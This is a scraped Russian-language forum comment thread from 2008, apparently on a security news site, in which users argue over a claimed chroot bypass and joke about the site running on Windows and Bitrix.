0 |
Bugg
29-11-2008 18:19:58
Акцентирую ваше внимание на использовании вами слова любой И кто после этого невнимательный? Как не вспомнить: "Когда слепые на улицах начнут учить тебя петь"Опять цепляетесь к словам. Вы к сути попробуйте прицепиться, по существу возразить. Ваш "способ обхода" никогда не работал и не работает до сих пор ни в одном случае применения chroot по назначению.
0 |
Верней, так должно быть: Когда глухие на улицах начнут учить тебя петь
0 |
Bugg
29-11-2008 18:23:43
Да постеснялись бы. Вы неоднократно с апломбом судили о том, в чем не разбираетесь, и учили меня "правильному отношению" к средствам защиты, механизмы работы и способы применения которых вы, в лучшем случае, представляете поверхностно и не без заблуждений.
0 |
Вполне допускаю того, что действительно сужу о том, в чём плохо разбираюсь. В конце концов, с чисто психологической точки зрения, для человека вполне нормально судить о чём-то, опираясь лишь на небольшую информацию об этом или по первому впечатлению. Но вот по поводу "правильного отношения" - это уже вы заблуждаетесь. Учить кого-то "правильным поступкам" мне не позволяет религия. На полном серьёзе! Просто потому, что понятие "правильности" установить очень трудно, оно расплывчато. Как говрится: "что русскому хорошо, то немцу - смерть"
0 |
Bugg
05-12-2008 05:50:53
В конце концов, с чисто психологической точки зрения, для человека вполне нормально судить о чём-то, опираясь лишь на небольшую информацию об этом или по первому впечатлению.Опять юлите. Вы делаете утверждения на темы, в которых не разбираетесь, игнорируете доступные источники знаний, по ходу разговора в вопросе разобраться НЕ стремитесь: ваши реплики направлены не на познание, а на усомнение, опровержение и утверждение противоположного. Такое поведение свойственно не всем людям, а лишь некоторым. [/QUOTE]Но вот по поводу "правильного отношения" - это уже вы заблуждаетесь. Учить кого-то "правильным поступкам" мне не позволяет религия.[QUOTE] Вы спорите со мной, придираетесь к словам. Я это имел ввиду. А отсутствие указаний, в духе "думай так, а не иначе", для меня ровным счетом ничего не меняет.
0 |
А как линуксоиды относятся к тому, что секлаб работает на винде? Когда же по-вашему будет секлабкапец???
0 |
93663
17-11-2008 12:23:58
1) Никак. 2) Кому он нах нужен.
0 |
Неубедительная попытка отмазки. Может быть всё потому, что серьёзных аргументов не найти?
0 |
88954
17-11-2008 15:22:08
Когда же по-вашему будет секлабкапец??? Секлабокапца не будет. В случае роста популярности винду и битрикс заменят на более приемлимые решения, как это часто бывает (например с теми же "Одноклассниками")
0 |
Да уж куда больше популярности-то? Сколько вас уже тут собралось...
0 |
33693
19-11-2008 12:33:13
Да тут дай бог, если несколько сотен уникальных посетителей одновременно.
0 |
17-11-2008 17:17:02
Попытка отмазки? Лол, да кому тут отмазываться-то надо? На чем работает Секлаб и когда ему настанет капец - действительно пофиг. Еще вопросы?
0 |
95375
17-11-2008 12:46:02
Так вот почему постоянно 503 Temporary unavailable вылетает. А я-то думал...
0 |
54272
17-11-2008 15:18:33
Да уж придётся, раз это норма для винды.
0 |
74788
17-11-2008 14:10:06
Секлаб не настолько крупен, чтобы использовать что-то серьёзное.
0 |
17-11-2008 17:11:50
Больше Виндовых уязвимостей, опасных и разных!
0 |
Страницы: 1  2  3  4